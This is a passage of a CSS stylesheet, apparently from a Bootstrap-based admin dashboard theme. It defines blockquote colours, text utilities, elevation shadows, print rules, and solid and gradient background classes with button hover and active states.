blockquote.quote-cyan h6 {
color: #17a2b8;
}
blockquote.quote-white {
border-color: #ffffff;
}
blockquote.quote-white h1,
blockquote.quote-white h2,
blockquote.quote-white h3,
blockquote.quote-white h4,
blockquote.quote-white h5,
blockquote.quote-white h6 {
color: #ffffff;
}
blockquote.quote-gray {
border-color: #6c757d;
}
blockquote.quote-gray h1,
blockquote.quote-gray h2,
blockquote.quote-gray h3,
blockquote.quote-gray h4,
blockquote.quote-gray h5,
blockquote.quote-gray h6 {
color: #6c757d;
}
blockquote.quote-gray-dark {
border-color: #343a40;
}
blockquote.quote-gray-dark h1,
blockquote.quote-gray-dark h2,
blockquote.quote-gray-dark h3,
blockquote.quote-gray-dark h4,
blockquote.quote-gray-dark h5,
blockquote.quote-gray-dark h6 {
color: #343a40;
}
.tab-custom-content {
border-top: 1px solid #dee2e6;
margin-top: .5rem;
padding-top: .5rem;
}
.nav + .tab-custom-content {
border-top: none;
border-bottom: 1px solid #dee2e6;
margin-top: 0;
margin-bottom: .5rem;
padding-bottom: .5rem;
}
.badge-btn {
border-radius: 0.15rem;
font-size: 0.75rem;
font-weight: 400;
padding: 0.25rem 0.5rem;
}
.badge-btn.badge-pill {
padding: .375rem .6rem;
}
@media print {
.no-print, .main-sidebar,
.main-header,
.content-header {
display: none !important;
}
.content-wrapper,
.main-footer {
-webkit-transform: translate(0, 0);
transform: translate(0, 0);
margin-left: 0 !important;
min-height: 0 !important;
}
.layout-fixed .content-wrapper {
padding-top: 0 !important;
}
.invoice {
border: 0;
margin: 0;
padding: 0;
width: 100%;
}
.invoice-col {
float: left;
width: 33.3333333%;
}
.table-responsive {
overflow: auto;
}
.table-responsive > .table tr th,
.table-responsive > .table tr td {
white-space: normal !important;
}
}
.text-bold, .text-bold.table td, .text-bold.table th {
font-weight: 700;
}
.text-xs {
font-size: 0.75rem !important;
}
.text-sm {
font-size: 0.875rem !important;
}
.text-md {
font-size: 1rem !important;
}
.text-lg {
font-size: 1.25rem !important;
}
.text-xl {
font-size: 2rem !important;
}
.text-lightblue {
color: #3c8dbc;
}
.text-navy {
color: #001f3f;
}
.text-olive {
color: #3d9970;
}
.text-lime {
color: #01ff70;
}
.text-fuchsia {
color: #f012be;
}
.text-maroon {
color: #d81b60;
}
.text-blue {
color: #007bff;
}
.text-indigo {
color: #6610f2;
}
.text-purple {
color: #6f42c1;
}
.text-pink {
color: #e83e8c;
}
.text-red {
color: #dc3545;
}
.text-orange {
color: #fd7e14;
}
.text-yellow {
color: #ffc107;
}
.text-green {
color: #28a745;
}
.text-teal {
color: #20c997;
}
.text-cyan {
color: #17a2b8;
}
.text-white {
color: #ffffff;
}
.text-gray {
color: #6c757d;
}
.text-gray-dark {
color: #343a40;
}
.elevation-0 {
box-shadow: none !important;
}
.elevation-1 {
box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24) !important;
}
.elevation-2 {
box-shadow: 0 3px 6px rgba(0, 0, 0, 0.16), 0 3px 6px rgba(0, 0, 0, 0.23) !important;
}
.elevation-3 {
box-shadow: 0 10px 20px rgba(0, 0, 0, 0.19), 0 6px 6px rgba(0, 0, 0, 0.23) !important;
}
.elevation-4 {
box-shadow: 0 14px 28px rgba(0, 0, 0, 0.25), 0 10px 10px rgba(0, 0, 0, 0.22) !important;
}
.elevation-5 {
box-shadow: 0 19px 38px rgba(0, 0, 0, 0.3), 0 15px 12px rgba(0, 0, 0, 0.22) !important;
}
.bg-primary {
background-color: #007bff !important;
}
.bg-primary,
.bg-primary > a {
color: #ffffff !important;
}
.bg-primary.btn:hover {
border-color: #0062cc;
color: #ececec;
}
.bg-primary.btn:not(:disabled):not(.disabled):active, .bg-primary.btn:not(:disabled):not(.disabled).active, .bg-primary.btn:active, .bg-primary.btn.active {
background-color: #0062cc !important;
border-color: #005cbf;
color: #ffffff;
}
.bg-secondary {
background-color: #6c757d !important;
}
.bg-secondary,
.bg-secondary > a {
color: #ffffff !important;
}
.bg-secondary.btn:hover {
border-color: #545b62;
color: #ececec;
}
.bg-secondary.btn:not(:disabled):not(.disabled):active, .bg-secondary.btn:not(:disabled):not(.disabled).active, .bg-secondary.btn:active, .bg-secondary.btn.active {
background-color: #545b62 !important;
border-color: #4e555b;
color: #ffffff;
}
.bg-success {
background-color: #28a745 !important;
}
.bg-success,
.bg-success > a {
color: #ffffff !important;
}
.bg-success.btn:hover {
border-color: #1e7e34;
color: #ececec;
}
.bg-success.btn:not(:disabled):not(.disabled):active, .bg-success.btn:not(:disabled):not(.disabled).active, .bg-success.btn:active, .bg-success.btn.active {
background-color: #1e7e34 !important;
border-color: #1c7430;
color: #ffffff;
}
.bg-info {
background-color: #17a2b8 !important;
}
.bg-info,
.bg-info > a {
color: #ffffff !important;
}
.bg-info.btn:hover {
border-color: #117a8b;
color: #ececec;
}
.bg-info.btn:not(:disabled):not(.disabled):active, .bg-info.btn:not(:disabled):not(.disabled).active, .bg-info.btn:active, .bg-info.btn.active {
background-color: #117a8b !important;
border-color: #10707f;
color: #ffffff;
}
.bg-warning {
background-color: #ffc107 !important;
}
.bg-warning,
.bg-warning > a {
color: #1F2D3D !important;
}
.bg-warning.btn:hover {
border-color: #d39e00;
color: #121a24;
}
.bg-warning.btn:not(:disabled):not(.disabled):active, .bg-warning.btn:not(:disabled):not(.disabled).active, .bg-warning.btn:active, .bg-warning.btn.active {
background-color: #d39e00 !important;
border-color: #c69500;
color: #1F2D3D;
}
.bg-danger {
background-color: #dc3545 !important;
}
.bg-danger,
.bg-danger > a {
color: #ffffff !important;
}
.bg-danger.btn:hover {
border-color: #bd2130;
color: #ececec;
}
.bg-danger.btn:not(:disabled):not(.disabled):active, .bg-danger.btn:not(:disabled):not(.disabled).active, .bg-danger.btn:active, .bg-danger.btn.active {
background-color: #bd2130 !important;
border-color: #b21f2d;
color: #ffffff;
}
.bg-light {
background-color: #f8f9fa !important;
}
.bg-light,
.bg-light > a {
color: #1F2D3D !important;
}
.bg-light.btn:hover {
border-color: #dae0e5;
color: #121a24;
}
.bg-light.btn:not(:disabled):not(.disabled):active, .bg-light.btn:not(:disabled):not(.disabled).active, .bg-light.btn:active, .bg-light.btn.active {
background-color: #dae0e5 !important;
border-color: #d3d9df;
color: #1F2D3D;
}
.bg-dark {
background-color: #343a40 !important;
}
.bg-dark,
.bg-dark > a {
color: #ffffff !important;
}
.bg-dark.btn:hover {
border-color: #1d2124;
color: #ececec;
}
.bg-dark.btn:not(:disabled):not(.disabled):active, .bg-dark.btn:not(:disabled):not(.disabled).active, .bg-dark.btn:active, .bg-dark.btn.active {
background-color: #1d2124 !important;
border-color: #171a1d;
color: #ffffff;
}
.bg-lightblue {
background-color: #3c8dbc !important;
}
.bg-lightblue,
.bg-lightblue > a {
color: #ffffff !important;
}
.bg-lightblue.btn:hover {
border-color: #307095;
color: #ececec;
}
.bg-lightblue.btn:not(:disabled):not(.disabled):active, .bg-lightblue.btn:not(:disabled):not(.disabled).active, .bg-lightblue.btn:active, .bg-lightblue.btn.active {
background-color: #307095 !important;
border-color: #2d698c;
color: #ffffff;
}
.bg-navy {
background-color: #001f3f !important;
}
.bg-navy,
.bg-navy > a {
color: #ffffff !important;
}
.bg-navy.btn:hover {
border-color: #00060c;
color: #ececec;
}
.bg-navy.btn:not(:disabled):not(.disabled):active, .bg-navy.btn:not(:disabled):not(.disabled).active, .bg-navy.btn:active, .bg-navy.btn.active {
background-color: #00060c !important;
border-color: black;
color: #ffffff;
}
.bg-olive {
background-color: #3d9970 !important;
}
.bg-olive,
.bg-olive > a {
color: #ffffff !important;
}
.bg-olive.btn:hover {
border-color: #2e7555;
color: #ececec;
}
.bg-olive.btn:not(:disabled):not(.disabled):active, .bg-olive.btn:not(:disabled):not(.disabled).active, .bg-olive.btn:active, .bg-olive.btn.active {
background-color: #2e7555 !important;
border-color: #2b6b4f;
color: #ffffff;
}
.bg-lime {
background-color: #01ff70 !important;
}
.bg-lime,
.bg-lime > a {
color: #1F2D3D !important;
}
.bg-lime.btn:hover {
border-color: #00cd5a;
color: #121a24;
}
.bg-lime.btn:not(:disabled):not(.disabled):active, .bg-lime.btn:not(:disabled):not(.disabled).active, .bg-lime.btn:active, .bg-lime.btn.active {
background-color: #00cd5a !important;
border-color: #00c054;
color: #ffffff;
}
.bg-fuchsia {
background-color: #f012be !important;
}
.bg-fuchsia,
.bg-fuchsia > a {
color: #ffffff !important;
}
.bg-fuchsia.btn:hover {
border-color: #c30c9a;
color: #ececec;
}
.bg-fuchsia.btn:not(:disabled):not(.disabled):active, .bg-fuchsia.btn:not(:disabled):not(.disabled).active, .bg-fuchsia.btn:active, .bg-fuchsia.btn.active {
background-color: #c30c9a !important;
border-color: #b70c90;
color: #ffffff;
}
.bg-maroon {
background-color: #d81b60 !important;
}
.bg-maroon,
.bg-maroon > a {
color: #ffffff !important;
}
.bg-maroon.btn:hover {
border-color: #ab154c;
color: #ececec;
}
.bg-maroon.btn:not(:disabled):not(.disabled):active, .bg-maroon.btn:not(:disabled):not(.disabled).active, .bg-maroon.btn:active, .bg-maroon.btn.active {
background-color: #ab154c !important;
border-color: #9f1447;
color: #ffffff;
}
.bg-blue {
background-color: #007bff !important;
}
.bg-blue,
.bg-blue > a {
color: #ffffff !important;
}
.bg-blue.btn:hover {
border-color: #0062cc;
color: #ececec;
}
.bg-blue.btn:not(:disabled):not(.disabled):active, .bg-blue.btn:not(:disabled):not(.disabled).active, .bg-blue.btn:active, .bg-blue.btn.active {
background-color: #0062cc !important;
border-color: #005cbf;
color: #ffffff;
}
.bg-indigo {
background-color: #6610f2 !important;
}
.bg-indigo,
.bg-indigo > a {
color: #ffffff !important;
}
.bg-indigo.btn:hover {
border-color: #510bc4;
color: #ececec;
}
.bg-indigo.btn:not(:disabled):not(.disabled):active, .bg-indigo.btn:not(:disabled):not(.disabled).active, .bg-indigo.btn:active, .bg-indigo.btn.active {
background-color: #510bc4 !important;
border-color: #4c0ab8;
color: #ffffff;
}
.bg-purple {
background-color: #6f42c1 !important;
}
.bg-purple,
.bg-purple > a {
color: #ffffff !important;
}
.bg-purple.btn:hover {
border-color: #59339d;
color: #ececec;
}
.bg-purple.btn:not(:disabled):not(.disabled):active, .bg-purple.btn:not(:disabled):not(.disabled).active, .bg-purple.btn:active, .bg-purple.btn.active {
background-color: #59339d !important;
border-color: #533093;
color: #ffffff;
}
.bg-pink {
background-color: #e83e8c !important;
}
.bg-pink,
.bg-pink > a {
color: #ffffff !important;
}
.bg-pink.btn:hover {
border-color: #d91a72;
color: #ececec;
}
.bg-pink.btn:not(:disabled):not(.disabled):active, .bg-pink.btn:not(:disabled):not(.disabled).active, .bg-pink.btn:active, .bg-pink.btn.active {
background-color: #d91a72 !important;
border-color: #ce196c;
color: #ffffff;
}
.bg-red {
background-color: #dc3545 !important;
}
.bg-red,
.bg-red > a {
color: #ffffff !important;
}
.bg-red.btn:hover {
border-color: #bd2130;
color: #ececec;
}
.bg-red.btn:not(:disabled):not(.disabled):active, .bg-red.btn:not(:disabled):not(.disabled).active, .bg-red.btn:active, .bg-red.btn.active {
background-color: #bd2130 !important;
border-color: #b21f2d;
color: #ffffff;
}
.bg-orange {
background-color: #fd7e14 !important;
}
.bg-orange,
.bg-orange > a {
color: #1F2D3D !important;
}
.bg-orange.btn:hover {
border-color: #dc6502;
color: #121a24;
}
.bg-orange.btn:not(:disabled):not(.disabled):active, .bg-orange.btn:not(:disabled):not(.disabled).active, .bg-orange.btn:active, .bg-orange.btn.active {
background-color: #dc6502 !important;
border-color: #cf5f02;
color: #ffffff;
}
.bg-yellow {
background-color: #ffc107 !important;
}
.bg-yellow,
.bg-yellow > a {
color: #1F2D3D !important;
}
.bg-yellow.btn:hover {
border-color: #d39e00;
color: #121a24;
}
.bg-yellow.btn:not(:disabled):not(.disabled):active, .bg-yellow.btn:not(:disabled):not(.disabled).active, .bg-yellow.btn:active, .bg-yellow.btn.active {
background-color: #d39e00 !important;
border-color: #c69500;
color: #1F2D3D;
}
.bg-green {
background-color: #28a745 !important;
}
.bg-green,
.bg-green > a {
color: #ffffff !important;
}
.bg-green.btn:hover {
border-color: #1e7e34;
color: #ececec;
}
.bg-green.btn:not(:disabled):not(.disabled):active, .bg-green.btn:not(:disabled):not(.disabled).active, .bg-green.btn:active, .bg-green.btn.active {
background-color: #1e7e34 !important;
border-color: #1c7430;
color: #ffffff;
}
.bg-teal {
background-color: #20c997 !important;
}
.bg-teal,
.bg-teal > a {
color: #ffffff !important;
}
.bg-teal.btn:hover {
border-color: #199d76;
color: #ececec;
}
.bg-teal.btn:not(:disabled):not(.disabled):active, .bg-teal.btn:not(:disabled):not(.disabled).active, .bg-teal.btn:active, .bg-teal.btn.active {
background-color: #199d76 !important;
border-color: #17926e;
color: #ffffff;
}
.bg-cyan {
background-color: #17a2b8 !important;
}
.bg-cyan,
.bg-cyan > a {
color: #ffffff !important;
}
.bg-cyan.btn:hover {
border-color: #117a8b;
color: #ececec;
}
.bg-cyan.btn:not(:disabled):not(.disabled):active, .bg-cyan.btn:not(:disabled):not(.disabled).active, .bg-cyan.btn:active, .bg-cyan.btn.active {
background-color: #117a8b !important;
border-color: #10707f;
color: #ffffff;
}
.bg-white {
background-color: #ffffff !important;
}
.bg-white,
.bg-white > a {
color: #1F2D3D !important;
}
.bg-white.btn:hover {
border-color: #e6e6e6;
color: #121a24;
}
.bg-white.btn:not(:disabled):not(.disabled):active, .bg-white.btn:not(:disabled):not(.disabled).active, .bg-white.btn:active, .bg-white.btn.active {
background-color: #e6e6e6 !important;
border-color: #dfdfdf;
color: #1F2D3D;
}
.bg-gray {
background-color: #6c757d !important;
}
.bg-gray,
.bg-gray > a {
color: #ffffff !important;
}
.bg-gray.btn:hover {
border-color: #545b62;
color: #ececec;
}
.bg-gray.btn:not(:disabled):not(.disabled):active, .bg-gray.btn:not(:disabled):not(.disabled).active, .bg-gray.btn:active, .bg-gray.btn.active {
background-color: #545b62 !important;
border-color: #4e555b;
color: #ffffff;
}
.bg-gray-dark {
background-color: #343a40 !important;
}
.bg-gray-dark,
.bg-gray-dark > a {
color: #ffffff !important;
}
.bg-gray-dark.btn:hover {
border-color: #1d2124;
color: #ececec;
}
.bg-gray-dark.btn:not(:disabled):not(.disabled):active, .bg-gray-dark.btn:not(:disabled):not(.disabled).active, .bg-gray-dark.btn:active, .bg-gray-dark.btn.active {
background-color: #1d2124 !important;
border-color: #171a1d;
color: #ffffff;
}
.bg-gray {
background-color: #adb5bd;
color: #1F2D3D;
}
.bg-gray-light {
background-color: #f2f4f5;
color: #1F2D3D !important;
}
.bg-black {
background-color: #000;
color: #ffffff !important;
}
.bg-white {
background-color: #ffffff;
color: #1F2D3D !important;
}
.bg-gradient-primary {
color: #ffffff;
}
.bg-gradient-primary {
background: #007bff linear-gradient(180deg, #268fff, #007bff) repeat-x !important;
}
.bg-gradient-primary.btn.disabled, .bg-gradient-primary.btn:disabled, .bg-gradient-primary.btn:not(:disabled):not(.disabled):active, .bg-gradient-primary.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-primary.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-primary.btn:hover {
border-color: #0062cc;
color: #ececec;
}
.bg-gradient-primary.btn:hover {
background: #0069d9 linear-gradient(180deg, #267fde, #0069d9) repeat-x !important;
}
.bg-gradient-primary.btn:not(:disabled):not(.disabled):active, .bg-gradient-primary.btn:not(:disabled):not(.disabled).active, .bg-gradient-primary.btn:active, .bg-gradient-primary.btn.active {
border-color: #005cbf;
color: #ffffff;
}
.bg-gradient-primary.btn:not(:disabled):not(.disabled):active, .bg-gradient-primary.btn:not(:disabled):not(.disabled).active, .bg-gradient-primary.btn:active, .bg-gradient-primary.btn.active {
background: #0062cc linear-gradient(180deg, #267ad4, #0062cc) repeat-x !important;
}
.bg-gradient-secondary {
color: #ffffff;
}
.bg-gradient-secondary {
background: #6c757d linear-gradient(180deg, #828a91, #6c757d) repeat-x !important;
}
.bg-gradient-secondary.btn.disabled, .bg-gradient-secondary.btn:disabled, .bg-gradient-secondary.btn:not(:disabled):not(.disabled):active, .bg-gradient-secondary.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-secondary.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-secondary.btn:hover {
border-color: #545b62;
color: #ececec;
}
.bg-gradient-secondary.btn:hover {
background: #5a6268 linear-gradient(180deg, #73797f, #5a6268) repeat-x !important;
}
.bg-gradient-secondary.btn:not(:disabled):not(.disabled):active, .bg-gradient-secondary.btn:not(:disabled):not(.disabled).active, .bg-gradient-secondary.btn:active, .bg-gradient-secondary.btn.active {
border-color: #4e555b;
color: #ffffff;
}
.bg-gradient-secondary.btn:not(:disabled):not(.disabled):active, .bg-gradient-secondary.btn:not(:disabled):not(.disabled).active, .bg-gradient-secondary.btn:active, .bg-gradient-secondary.btn.active {
background: #545b62 linear-gradient(180deg, #6e7479, #545b62) repeat-x !important;
}
.bg-gradient-success {
color: #ffffff;
}
.bg-gradient-success {
background: #28a745 linear-gradient(180deg, #48b461, #28a745) repeat-x !important;
}
.bg-gradient-success.btn.disabled, .bg-gradient-success.btn:disabled, .bg-gradient-success.btn:not(:disabled):not(.disabled):active, .bg-gradient-success.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-success.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-success.btn:hover {
border-color: #1e7e34;
color: #ececec;
}
.bg-gradient-success.btn:hover {
background: #218838 linear-gradient(180deg, #429a56, #218838) repeat-x !important;
}
.bg-gradient-success.btn:not(:disabled):not(.disabled):active, .bg-gradient-success.btn:not(:disabled):not(.disabled).active, .bg-gradient-success.btn:active, .bg-gradient-success.btn.active {
border-color: #1c7430;
color: #ffffff;
}
.bg-gradient-success.btn:not(:disabled):not(.disabled):active, .bg-gradient-success.btn:not(:disabled):not(.disabled).active, .bg-gradient-success.btn:active, .bg-gradient-success.btn.active {
background: #1e7e34 linear-gradient(180deg, #409152, #1e7e34) repeat-x !important;
}
.bg-gradient-info {
color: #ffffff;
}
.bg-gradient-info {
background: #17a2b8 linear-gradient(180deg, #3ab0c3, #17a2b8) repeat-x !important;
}
.bg-gradient-info.btn.disabled, .bg-gradient-info.btn:disabled, .bg-gradient-info.btn:not(:disabled):not(.disabled):active, .bg-gradient-info.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-info.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-info.btn:hover {
border-color: #117a8b;
color: #ececec;
}
.bg-gradient-info.btn:hover {
background: #138496 linear-gradient(180deg, #3697a6, #138496) repeat-x !important;
}
.bg-gradient-info.btn:not(:disabled):not(.disabled):active, .bg-gradient-info.btn:not(:disabled):not(.disabled).active, .bg-gradient-info.btn:active, .bg-gradient-info.btn.active {
border-color: #10707f;
color: #ffffff;
}
.bg-gradient-info.btn:not(:disabled):not(.disabled):active, .bg-gradient-info.btn:not(:disabled):not(.disabled).active, .bg-gradient-info.btn:active, .bg-gradient-info.btn.active {
background: #117a8b linear-gradient(180deg, #358e9c, #117a8b) repeat-x !important;
}
.bg-gradient-warning {
color: #1F2D3D;
}
.bg-gradient-warning {
background: #ffc107 linear-gradient(180deg, #ffca2c, #ffc107) repeat-x !important;
}
.bg-gradient-warning.btn.disabled, .bg-gradient-warning.btn:disabled, .bg-gradient-warning.btn:not(:disabled):not(.disabled):active, .bg-gradient-warning.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-warning.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-warning.btn:hover {
border-color: #d39e00;
color: #121a24;
}
.bg-gradient-warning.btn:hover {
background: #e0a800 linear-gradient(180deg, #e4b526, #e0a800) repeat-x !important;
}
.bg-gradient-warning.btn:not(:disabled):not(.disabled):active, .bg-gradient-warning.btn:not(:disabled):not(.disabled).active, .bg-gradient-warning.btn:active, .bg-gradient-warning.btn.active {
border-color: #c69500;
color: #1F2D3D;
}
.bg-gradient-warning.btn:not(:disabled):not(.disabled):active, .bg-gradient-warning.btn:not(:disabled):not(.disabled).active, .bg-gradient-warning.btn:active, .bg-gradient-warning.btn.active {
background: #d39e00 linear-gradient(180deg, #daad26, #d39e00) repeat-x !important;
}
.bg-gradient-danger {
color: #ffffff;
}
.bg-gradient-danger {
background: #dc3545 linear-gradient(180deg, #e15361, #dc3545) repeat-x !important;
}
.bg-gradient-danger.btn.disabled, .bg-gradient-danger.btn:disabled, .bg-gradient-danger.btn:not(:disabled):not(.disabled):active, .bg-gradient-danger.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-danger.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-danger.btn:hover {
border-color: #bd2130;
color: #ececec;
}
.bg-gradient-danger.btn:hover {
background: #c82333 linear-gradient(180deg, #d04451, #c82333) repeat-x !important;
}
.bg-gradient-danger.btn:not(:disabled):not(.disabled):active, .bg-gradient-danger.btn:not(:disabled):not(.disabled).active, .bg-gradient-danger.btn:active, .bg-gradient-danger.btn.active {
border-color: #b21f2d;
color: #ffffff;
}
.bg-gradient-danger.btn:not(:disabled):not(.disabled):active, .bg-gradient-danger.btn:not(:disabled):not(.disabled).active, .bg-gradient-danger.btn:active, .bg-gradient-danger.btn.active {
background: #bd2130 linear-gradient(180deg, #c7424f, #bd2130) repeat-x !important;
}
.bg-gradient-light {
color: #1F2D3D;
}
.bg-gradient-light {
background: #f8f9fa linear-gradient(180deg, #f9fafb, #f8f9fa) repeat-x !important;
}
.bg-gradient-light.btn.disabled, .bg-gradient-light.btn:disabled, .bg-gradient-light.btn:not(:disabled):not(.disabled):active, .bg-gradient-light.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-light.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-light.btn:hover {
border-color: #dae0e5;
color: #121a24;
}
.bg-gradient-light.btn:hover {
background: #e2e6ea linear-gradient(180deg, #e6eaed, #e2e6ea) repeat-x !important;
}
.bg-gradient-light.btn:not(:disabled):not(.disabled):active, .bg-gradient-light.btn:not(:disabled):not(.disabled).active, .bg-gradient-light.btn:active, .bg-gradient-light.btn.active {
border-color: #d3d9df;
color: #1F2D3D;
}
.bg-gradient-light.btn:not(:disabled):not(.disabled):active, .bg-gradient-light.btn:not(:disabled):not(.disabled).active, .bg-gradient-light.btn:active, .bg-gradient-light.btn.active {
background: #dae0e5 linear-gradient(180deg, #e0e4e9, #dae0e5) repeat-x !important;
}
.bg-gradient-dark {
color: #ffffff;
}
.bg-gradient-dark {
background: #343a40 linear-gradient(180deg, #52585d, #343a40) repeat-x !important;
}
.bg-gradient-dark.btn.disabled, .bg-gradient-dark.btn:disabled, .bg-gradient-dark.btn:not(:disabled):not(.disabled):active, .bg-gradient-dark.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-dark.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-dark.btn:hover {
border-color: #1d2124;
color: #ececec;
}
.bg-gradient-dark.btn:hover {
background: #23272b linear-gradient(180deg, #44474b, #23272b) repeat-x !important;
}
.bg-gradient-dark.btn:not(:disabled):not(.disabled):active, .bg-gradient-dark.btn:not(:disabled):not(.disabled).active, .bg-gradient-dark.btn:active, .bg-gradient-dark.btn.active {
border-color: #171a1d;
color: #ffffff;
}
.bg-gradient-dark.btn:not(:disabled):not(.disabled):active, .bg-gradient-dark.btn:not(:disabled):not(.disabled).active, .bg-gradient-dark.btn:active, .bg-gradient-dark.btn.active {
background: #1d2124 linear-gradient(180deg, #3f4245, #1d2124) repeat-x !important;
}
.bg-gradient-lightblue {
color: #ffffff;
}
.bg-gradient-lightblue {
background: #3c8dbc linear-gradient(180deg, #599ec6, #3c8dbc) repeat-x !important;
}
.bg-gradient-lightblue.btn.disabled, .bg-gradient-lightblue.btn:disabled, .bg-gradient-lightblue.btn:not(:disabled):not(.disabled):active, .bg-gradient-lightblue.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-lightblue.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-lightblue.btn:hover {
border-color: #307095;
color: #ececec;
}
.bg-gradient-lightblue.btn:hover {
background: #33779f linear-gradient(180deg, #518cad, #33779f) repeat-x !important;
}
.bg-gradient-lightblue.btn:not(:disabled):not(.disabled):active, .bg-gradient-lightblue.btn:not(:disabled):not(.disabled).active, .bg-gradient-lightblue.btn:active, .bg-gradient-lightblue.btn.active {
border-color: #2d698c;
color: #ffffff;
}
.bg-gradient-lightblue.btn:not(:disabled):not(.disabled):active, .bg-gradient-lightblue.btn:not(:disabled):not(.disabled).active, .bg-gradient-lightblue.btn:active, .bg-gradient-lightblue.btn.active {
background: #307095 linear-gradient(180deg, #4f85a5, #307095) repeat-x !important;
}
.bg-gradient-navy {
color: #ffffff;
}
.bg-gradient-navy {
background: #001f3f linear-gradient(180deg, #26415c, #001f3f) repeat-x !important;
}
.bg-gradient-navy.btn.disabled, .bg-gradient-navy.btn:disabled, .bg-gradient-navy.btn:not(:disabled):not(.disabled):active, .bg-gradient-navy.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-navy.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-navy.btn:hover {
border-color: #00060c;
color: #ececec;
}
.bg-gradient-navy.btn:hover {
background: #000c19 linear-gradient(180deg, #26313b, #000c19) repeat-x !important;
}
.bg-gradient-navy.btn:not(:disabled):not(.disabled):active, .bg-gradient-navy.btn:not(:disabled):not(.disabled).active, .bg-gradient-navy.btn:active, .bg-gradient-navy.btn.active {
border-color: black;
color: #ffffff;
}
.bg-gradient-navy.btn:not(:disabled):not(.disabled):active, .bg-gradient-navy.btn:not(:disabled):not(.disabled).active, .bg-gradient-navy.btn:active, .bg-gradient-navy.btn.active {
background: #00060c linear-gradient(180deg, #262b30, #00060c) repeat-x !important;
}
.bg-gradient-olive {
color: #ffffff;
}
.bg-gradient-olive {
background: #3d9970 linear-gradient(180deg, #5aa885, #3d9970) repeat-x !important;
}
.bg-gradient-olive.btn.disabled, .bg-gradient-olive.btn:disabled, .bg-gradient-olive.btn:not(:disabled):not(.disabled):active, .bg-gradient-olive.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-olive.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-olive.btn:hover {
border-color: #2e7555;
color: #ececec;
}
.bg-gradient-olive.btn:hover {
background: #327e5c linear-gradient(180deg, #519174, #327e5c) repeat-x !important;
}
.bg-gradient-olive.btn:not(:disabled):not(.disabled):active, .bg-gradient-olive.btn:not(:disabled):not(.disabled).active, .bg-gradient-olive.btn:active, .bg-gradient-olive.btn.active {
border-color: #2b6b4f;
color: #ffffff;
}
.bg-gradient-olive.btn:not(:disabled):not(.disabled):active, .bg-gradient-olive.btn:not(:disabled):not(.disabled).active, .bg-gradient-olive.btn:active, .bg-gradient-olive.btn.active {
background: #2e7555 linear-gradient(180deg, #4e896f, #2e7555) repeat-x !important;
}
.bg-gradient-lime {
color: #1F2D3D;
}
.bg-gradient-lime {
background: #01ff70 linear-gradient(180deg, #27ff85, #01ff70) repeat-x !important;
}
.bg-gradient-lime.btn.disabled, .bg-gradient-lime.btn:disabled, .bg-gradient-lime.btn:not(:disabled):not(.disabled):active, .bg-gradient-lime.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-lime.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-lime.btn:hover {
border-color: #00cd5a;
color: #121a24;
}
.bg-gradient-lime.btn:hover {
background: #00da5f linear-gradient(180deg, #26df77, #00da5f) repeat-x !important;
}
.bg-gradient-lime.btn:not(:disabled):not(.disabled):active, .bg-gradient-lime.btn:not(:disabled):not(.disabled).active, .bg-gradient-lime.btn:active, .bg-gradient-lime.btn.active {
border-color: #00c054;
color: #ffffff;
}
.bg-gradient-lime.btn:not(:disabled):not(.disabled):active, .bg-gradient-lime.btn:not(:disabled):not(.disabled).active, .bg-gradient-lime.btn:active, .bg-gradient-lime.btn.active {
background: #00cd5a linear-gradient(180deg, #26d572, #00cd5a) repeat-x !important;
}
.bg-gradient-fuchsia {
color: #ffffff;
}
.bg-gradient-fuchsia {
background: #f012be linear-gradient(180deg, #f236c8, #f012be) repeat-x !important;
}
.bg-gradient-fuchsia.btn.disabled, .bg-gradient-fuchsia.btn:disabled, .bg-gradient-fuchsia.btn:not(:disabled):not(.disabled):active, .bg-gradient-fuchsia.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-fuchsia.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-fuchsia.btn:hover {
border-color: #c30c9a;
color: #ececec;
}
.bg-gradient-fuchsia.btn:hover {
background: #cf0da3 linear-gradient(180deg, #d631b1, #cf0da3) repeat-x !important;
}
.bg-gradient-fuchsia.btn:not(:disabled):not(.disabled):active, .bg-gradient-fuchsia.btn:not(:disabled):not(.disabled).active, .bg-gradient-fuchsia.btn:active, .bg-gradient-fuchsia.btn.active {
border-color: #b70c90;
color: #ffffff;
}
.bg-gradient-fuchsia.btn:not(:disabled):not(.disabled):active, .bg-gradient-fuchsia.btn:not(:disabled):not(.disabled).active, .bg-gradient-fuchsia.btn:active, .bg-gradient-fuchsia.btn.active {
background: #c30c9a linear-gradient(180deg, #cc31a9, #c30c9a) repeat-x !important;
}
.bg-gradient-maroon {
color: #ffffff;
}
.bg-gradient-maroon {
background: #d81b60 linear-gradient(180deg, #de3d78, #d81b60) repeat-x !important;
}
.bg-gradient-maroon.btn.disabled, .bg-gradient-maroon.btn:disabled, .bg-gradient-maroon.btn:not(:disabled):not(.disabled):active, .bg-gradient-maroon.btn:not(:disabled):not(.disabled).active,
.show > .bg-gradient-maroon.btn.dropdown-toggle {
background-image: none !important;
}
.bg-gradient-maroon.btn:hover {
border-color: #ab154c;
color: #ececec;
}
